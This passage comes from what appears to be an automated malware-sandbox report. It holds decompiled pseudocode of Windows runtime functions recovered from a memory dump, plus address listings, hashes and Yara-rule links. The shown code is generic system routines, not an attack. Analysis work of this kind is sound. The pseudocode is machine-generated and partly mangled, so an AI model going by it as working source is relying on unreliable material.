					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E047F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04857016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x48c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x48c7b00; // 0x0
							asm("ror esi, cl");
							 *0x48cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E048195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E047E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                        0x048003f1
                                                        0x048003f7
                                                        0x048003f9
                                                        0x048003fb
                                                        0x048003fd
                                                        0x04800400
                                                        0x0480040a
                                                        0x04844c7a
                                                        0x04800537
                                                        0x04800547
                                                        0x04800410
                                                        0x04800410
                                                        0x04800414
                                                        0x04800417
                                                        0x0480041a
                                                        0x04800421
                                                        0x04800424
                                                        0x0480042b
                                                        0x0480043b
                                                        0x0480043e
                                                        0x0480043f
                                                        0x0480043f
                                                        0x04800446
                                                        0x04800449
                                                        0x0480044c
                                                        0x0480044f
                                                        0x04800459
                                                        0x04844c8d
                                                        0x0480045f
                                                        0x0480045f
                                                        0x0480045f
                                                        0x04800467
                                                        0x04844c97
                                                        0x04844c9d
                                                        0x04844ca4
                                                        0x04844caa
                                                        0x04844caf
                                                        0x04844cb1
                                                        0x04844cc3
                                                        0x04844cb3
                                                        0x04844cbc
                                                        0x04844cbc
                                                        0x04844cc8
                                                        0x04844ccb
                                                        0x04844cd7
                                                        0x04844cda
                                                        0x04844cdf
                                                        0x04844cdf
                                                        0x04844ccb
                                                        0x04844ca4
                                                        0x0480046d
                                                        0x0480046f
                                                        0x0480046f
                                                        0x04800471
                                                        0x04800476
                                                        0x0480047a
                                                        0x0480047b
                                                        0x04800483
                                                        0x04800489
                                                        0x0480048d
                                                        0x00000000
                                                        0x00000000
                                                        0x04844ce9
                                                        0x04844cef
                                                        0x04844d22
                                                        0x04844d22
                                                        0x00000000
                                                        0x04844d22
                                                        0x04844cf1
                                                        0x04844cf7
                                                        0x00000000
                                                        0x00000000
                                                        0x04844cf9
                                                        0x04844cff
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d05
                                                        0x04844d07
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d0d
                                                        0x04844d0f
                                                        0x04844d14
                                                        0x04844d16
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d1c
                                                        0x04844d1c
                                                        0x04800499
                                                        0x04800535
                                                        0x04800535
                                                        0x00000000
                                                        0x04800535
                                                        0x048004a6
                                                        0x04844d2c
                                                        0x04844d37
                                                        0x04844d39
                                                        0x04844d3b
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d41
                                                        0x04844d48
                                                        0x04800527
                                                        0x0480052b
                                                        0x0480052d
                                                        0x04800530
                                                        0x04800530
                                                        0x00000000
                                                        0x0480052b
                                                        0x04844d4e
                                                        0x048004ac
                                                        0x048004ac
                                                        0x048004af
                                                        0x048004b2
                                                        0x048004b7
                                                        0x048004b9
                                                        0x048004bb
                                                        0x048004bd
                                                        0x048004bf
                                                        0x048004c5
                                                        0x048004c9
                                                        0x04844d53
                                                        0x04844d59
                                                        0x04844db9
                                                        0x04844dba
                                                        0x04844dbf
                                                        0x04844dc2
                                                        0x04844dc4
                                                        0x04844dc7
                                                        0x04844dce
                                                        0x00000000
                                                        0x04844dce
                                                        0x04844d5b
                                                        0x04844d61
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d63
                                                        0x04844d69
                                                        0x00000000
                                                        0x00000000
                                                        0x04844d6b
                                                        0x04844d6e
                                                        0x04844d74
                                                        0x04844d76
                                                        0x04844d7c
                                                        0x04844d7e
                                                        0x04844d84
                                                        0x04844d89
                                                        0x04844d8c
                                                        0x04844d8d
                                                        0x04844d92
                                                        0x04844d95
                                                        0x04844d96
                                                        0x04844d98
                                                        0x04844d9a
                                                        0x04844d9f
                                                        0x04844da4
                                                        0x04844da6
                                                        0x04844da8
                                                        0x04844daf
                                                        0x04844db1
                                                        0x04844db1
                                                        0x04844daf
                                                        0x04844da6
                                                        0x04844d84
                                                        0x04844d7c
                                                        0x00000000
                                                        0x04844d74
                                                        0x048004d6
                                                        0x04844de1
                                                        0x048004dc
                                                        0x048004dc
                                                        0x048004dc
                                                        0x048004e4
                                                        0x04844deb
                                                        0x04844df1
                                                        0x04844df8
                                                        0x04844dfe
                                                        0x04844e03
                                                        0x04844e05
                                                        0x04844e17
                                                        0x04844e07
                                                        0x04844e10
                                                        0x04844e10
                                                        0x04844e1c
                                                        0x04844e1f
                                                        0x04844e35
                                                        0x04844e35
                                                        0x04844e1f
                                                        0x04844df8
                                                        0x048004f1
                                                        0x048004fa
                                                        0x04844e3f
                                                        0x04844e47
                                                        0x04844e5b
                                                        0x04844e61
                                                        0x04844e67
                                                        0x04844e69
                                                        0x04844e71
                                                        0x04844e73
                                                        0x04800500
                                                        0x04800500
                                                        0x04800500
                                                        0x048004fa
                                                        0x04800508
                                                        0x0480051d
                                                        0x0480051d
                                                        0x0480051f
                                                        0x04800524
                                                        0x00000000
                                                        0x04800524
                                                        0x04800515
                                                        0x04800517
                                                        0x04844e7a
                                                        0x04844e7c
                                                        0x00000000
                                                        0x00000000
                                                        0x04844e85
                                                        0x00000000
                                                        0x04844e85
                                                        0x00000000
                                                        0x04800517

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f77a5043c5a4a752cb926b49bea49634db231dac8db50cf8875fa2fc9dacc768
                                                        • Instruction ID: 405616b32b74ac3ba3cb0f8ae2a560115360d38e95698ddd8998f62bb3e75b87
                                                        • Opcode Fuzzy Hash: f77a5043c5a4a752cb926b49bea49634db231dac8db50cf8875fa2fc9dacc768
                                                        • Instruction Fuzzy Hash: F9913A31F00658AFEB219F68DC44BAD77A4EB46B28F054B61E910E72E1E774BD40C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DC600, Relevance: .2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E047DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x48cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E047E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0481B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x48c7b9c; // 0x0
					_t74 = L047F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04819650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L047F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0481F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E048113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L047F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04819650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                        0x047dc608
                                                        0x047dc615
                                                        0x047dc625
                                                        0x047dc62d
                                                        0x047dc635
                                                        0x047dc640
                                                        0x047dc680
                                                        0x047dc687
                                                        0x047dc688
                                                        0x047dc689
                                                        0x047dc694
                                                        0x047dc694
                                                        0x047dc642
                                                        0x047dc64a
                                                        0x047dc697
                                                        0x04847a25
                                                        0x04847a2b
                                                        0x04847a2e
                                                        0x04847a30
                                                        0x04847bea
                                                        0x04847bea
                                                        0x00000000
                                                        0x04847bea
                                                        0x04847a36
                                                        0x04847a43
                                                        0x04847a48
                                                        0x04847a4c
                                                        0x04847a4e
                                                        0x00000000
                                                        0x00000000
                                                        0x04847a58
                                                        0x04847a5a
                                                        0x04847a5b
                                                        0x04847a5c
                                                        0x04847a5d
                                                        0x04847a63
                                                        0x04847a64
                                                        0x04847a6a
                                                        0x04847a6c
                                                        0x04847a6e
                                                        0x048479cb
                                                        0x048479cb
                                                        0x048479ce
                                                        0x048479d0
                                                        0x04847a98
                                                        0x04847a9b
                                                        0x04847a9b
                                                        0x04847a9e
                                                        0x04847aa1
                                                        0x04847bbe
                                                        0x04847bbe
                                                        0x04847bc0
                                                        0x04847be0
                                                        0x04847be0
                                                        0x04847a01
                                                        0x04847a01
                                                        0x04847a05
                                                        0x04847a07
                                                        0x04847a15
                                                        0x04847a15
                                                        0x04847a1a
                                                        0x00000000
                                                        0x04847a1a
                                                        0x04847bc2
                                                        0x04847bc6
                                                        0x04847bc9
                                                        0x04847bcd
                                                        0x04847bcf
                                                        0x048479e6
                                                        0x048479e6
                                                        0x048479eb
                                                        0x048479eb
                                                        0x048479ef
                                                        0x048479f1
                                                        0x00000000
                                                        0x00000000
                                                        0x048479f3
                                                        0x048479f5
                                                        0x048479ff
                                                        0x048479ff
                                                        0x00000000
                                                        0x048479ff
                                                        0x048479f7
                                                        0x048479fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048479fd
                                                        0x04847bd5
                                                        0x04847bd8
                                                        0x00000000
                                                        0x00000000
                                                        0x04847ba9
                                                        0x04847bac
                                                        0x04847bb0
                                                        0x04847bb1
                                                        0x04847bb1
                                                        0x04847bb6
                                                        0x00000000
                                                        0x04847bb6
                                                        0x04847aa7
                                                        0x04847aaa
                                                        0x00000000
                                                        0x00000000
                                                        0x04847ab2
                                                        0x04847ab3
                                                        0x04847ab5
                                                        0x04847aec
                                                        0x04847aef
                                                        0x04847b25
                                                        0x04847b28
                                                        0x04847b62
                                                        0x04847b64
                                                        0x04847b8f
                                                        0x04847b92
                                                        0x04847b96
                                                        0x04847b98
                                                        0x00000000
                                                        0x00000000
                                                        0x04847b9e
                                                        0x04847b9f
                                                        0x04847ba3
                                                        0x00000000
                                                        0x04847ba3
                                                        0x04847b66
                                                        0x04847b68
                                                        0x04847ae2
                                                        0x04847ae2
                                                        0x00000000
                                                        0x04847ae2
                                                        0x04847b6e
                                                        0x04847b72
                                                        0x04847b75
                                                        0x04847b81
                                                        0x04847b85
                                                        0x04847b87
                                                        0x00000000
                                                        0x00000000
                                                        0x04847b31
                                                        0x04847b34
                                                        0x04847b3c
                                                        0x04847b45
                                                        0x04847b46
                                                        0x04847b4f
                                                        0x04847b51
                                                        0x04847b57
                                                        0x04847b59
                                                        0x04847b59
                                                        0x00000000
                                                        0x04847b59
                                                        0x04847b77
                                                        0x00000000
                                                        0x04847b77
                                                        0x04847b2a
                                                        0x00000000
                                                        0x04847b2a
                                                        0x04847af1
                                                        0x04847af3
                                                        0x00000000
                                                        0x00000000
                                                        0x04847afb
                                                        0x04847afc
                                                        0x04847afe
                                                        0x00000000
                                                        0x00000000
                                                        0x04847b00
                                                        0x04847b03
                                                        0x00000000
                                                        0x00000000
                                                        0x04847b05
                                                        0x04847b09
                                                        0x04847b0d
                                                        0x04847b0f
                                                        0x00000000
                                                        0x00000000
                                                        0x04847b18
                                                        0x04847b1d
                                                        0x00000000
                                                        0x04847b1d
                                                        0x04847ab7
                                                        0x04847ab9
                                                        0x00000000
                                                        0x00000000
                                                        0x04847abf
                                                        0x04847ac1
                                                        0x00000000
                                                        0x00000000
                                                        0x04847ac3
                                                        0x04847ac6
                                                        0x00000000
                                                        0x00000000
                                                        0x04847ac8
                                                        0x04847acc
                                                        0x04847ad0
                                                        0x04847ad2
                                                        0x00000000
                                                        0x00000000
                                                        0x04847adb
                                                        0x00000000
                                                        0x04847adb
                                                        0x048479d6
                                                        0x048479d9
                                                        0x048479dc
                                                        0x04847a91
                                                        0x04847a94
                                                        0x00000000
                                                        0x04847a94
                                                        0x048479e2
                                                        0x00000000
                                                        0x048479e2
                                                        0x04847a74
                                                        0x04847a7a
                                                        0x00000000
                                                        0x00000000
                                                        0x04847a8a
                                                        0x04847a21
                                                        0x04847a21
                                                        0x00000000
                                                        0x04847a21
                                                        0x047dc650
                                                        0x047dc651
                                                        0x047dc656
                                                        0x047dc65c
                                                        0x047dc65d
                                                        0x047dc663
                                                        0x047dc664
                                                        0x047dc66a
                                                        0x047dc66e
                                                        0x048479c5
                                                        0x048479c7
                                                        0x00000000
                                                        0x048479c7
                                                        0x047dc67a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ec2095726ad8b352621383bc1d3e89b529321ea6e9bb06ea23a8e772a81c07a1
                                                        • Instruction ID: e4f0db321510c5323613b55bb826d6089eb2318d8a65238770497a3c21e5d60b
                                                        • Opcode Fuzzy Hash: ec2095726ad8b352621383bc1d3e89b529321ea6e9bb06ea23a8e772a81c07a1
                                                        • Instruction Fuzzy Hash: 3A8180756442498FDB26CE54C880A6AB7A8EFC4358F144E6AED45DB380E334FD41CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0486B8D0, Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E0486B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x48c7b9c; // 0x0
				_t124 = L047F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04819800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E048195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E048195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L047F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04819910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E048195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x48c7b9c; // 0x0
									_t92 = L047F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04819910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E047DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0486E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0486E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E048195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                        0x0486b8d9
                                                        0x0486b8e4
                                                        0x00000000
                                                        0x0486b8e6
                                                        0x0486b8f3
                                                        0x0486b8f5
                                                        0x0486b8f5
                                                        0x0486b8f8
                                                        0x0486b920
                                                        0x0486b924
                                                        0x0486b936
                                                        0x0486b939
                                                        0x0486b93d
                                                        0x0486b948
                                                        0x0486b9a0
                                                        0x0486b9a0
                                                        0x0486b9a4
                                                        0x0486b9bf
                                                        0x0486b9c4
                                                        0x0486b9c6
                                                        0x0486b9cd
                                                        0x0486b9d1
                                                        0x0486bad4
                                                        0x0486bad8
                                                        0x0486bada
                                                        0x0486badc
                                                        0x0486badc
                                                        0x0486badf
                                                        0x0486bae0
                                                        0x0486bae2
                                                        0x0486bae4
                                                        0x0486baec
                                                        0x0486baee
                                                        0x0486baf0
                                                        0x0486baf0
                                                        0x0486baec
                                                        0x0486bafb
                                                        0x0486bafc
                                                        0x0486bafe
                                                        0x0486bb01
                                                        0x0486bb01
                                                        0x00000000
                                                        0x0486bb06
                                                        0x0486b9d7
                                                        0x0486b9db
                                                        0x0486b9db
                                                        0x0486b9de
                                                        0x0486b9de
                                                        0x0486b9e4
                                                        0x0486b9e7
                                                        0x0486b9ea
                                                        0x0486b9ec
                                                        0x0486b9ef
                                                        0x0486b9f3
                                                        0x0486ba1b
                                                        0x0486ba1b
                                                        0x0486ba23
                                                        0x0486ba24
                                                        0x0486ba27
                                                        0x0486ba2a
                                                        0x0486ba2b
                                                        0x0486ba2e
                                                        0x0486ba30
                                                        0x0486ba37
                                                        0x0486ba3f
                                                        0x0486ba9c
                                                        0x0486baa2
                                                        0x0486bb13
                                                        0x0486bb15
                                                        0x0486baae
                                                        0x0486baae
                                                        0x0486bab3
                                                        0x0486bab5
                                                        0x0486baba
                                                        0x0486bac8
                                                        0x0486bac8
                                                        0x0486baba
                                                        0x0486bacd
                                                        0x0486bacf
                                                        0x00000000
                                                        0x0486bacf
                                                        0x0486bb1a
                                                        0x00000000
                                                        0x0486bb1c
                                                        0x0486baa7
                                                        0x0486bb11
                                                        0x00000000
                                                        0x0486bb11
                                                        0x0486baa9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0486ba41
                                                        0x0486ba41
                                                        0x0486ba41
                                                        0x0486ba58
                                                        0x0486ba5d
                                                        0x0486ba62
                                                        0x00000000
                                                        0x00000000
                                                        0x0486ba64
                                                        0x0486ba67
                                                        0x0486ba68
                                                        0x0486ba69
                                                        0x0486ba6c
                                                        0x0486ba6f
                                                        0x0486ba71
                                                        0x0486ba78
                                                        0x0486ba80
                                                        0x00000000
                                                        0x00000000
                                                        0x0486ba90
                                                        0x0486ba90
                                                        0x0486ba97
                                                        0x00000000
                                                        0x0486ba97
                                                        0x0486b9f5
                                                        0x0486b9f7
                                                        0x0486b9f7
                                                        0x0486b9fa
                                                        0x0486ba03
                                                        0x0486ba07
                                                        0x0486ba0c
                                                        0x0486ba10
                                                        0x0486ba17
                                                        0x00000000
                                                        0x0486b9f7
                                                        0x0486b9a6
                                                        0x0486b9a8
                                                        0x0486b9af
                                                        0x0486b9b3
                                                        0x00000000
                                                        0x00000000
                                                        0x0486b9b9
                                                        0x00000000
                                                        0x0486b9b9
                                                        0x0486b94d
                                                        0x0486b98f
                                                        0x0486b995
                                                        0x0486b999
                                                        0x0486b960
                                                        0x0486b967
                                                        0x0486b968
                                                        0x0486b96a
                                                        0x00000000
                                                        0x0486b96a
                                                        0x0486b99b
                                                        0x0486b99e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0486b99e
                                                        0x0486b951
                                                        0x0486b954
                                                        0x0486b95a
                                                        0x0486b95e
                                                        0x0486b972
                                                        0x0486b979
                                                        0x0486b97d
                                                        0x0486b97f
                                                        0x0486b980
                                                        0x0486b982
                                                        0x0486b984
                                                        0x00000000
                                                        0x0486b984
                                                        0x00000000
                                                        0x0486b926
                                                        0x00000000
                                                        0x0486b926

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73a4f72e2a39f0f2e75f6263e5d4040a3363074f2fc242bc9e35028a168fadc6
                                                        • Instruction ID: 8d821d866286ca348d170b0ce76ab9d5b185673afc302e466dbd8974d14ddaa9
                                                        • Opcode Fuzzy Hash: 73a4f72e2a39f0f2e75f6263e5d4040a3363074f2fc242bc9e35028a168fadc6
                                                        • Instruction Fuzzy Hash: C971F132240715AFE7729F18C844F66B7B9EB40728F144E28E656D72A1EB75F940CB50
                                                        Uniqueness

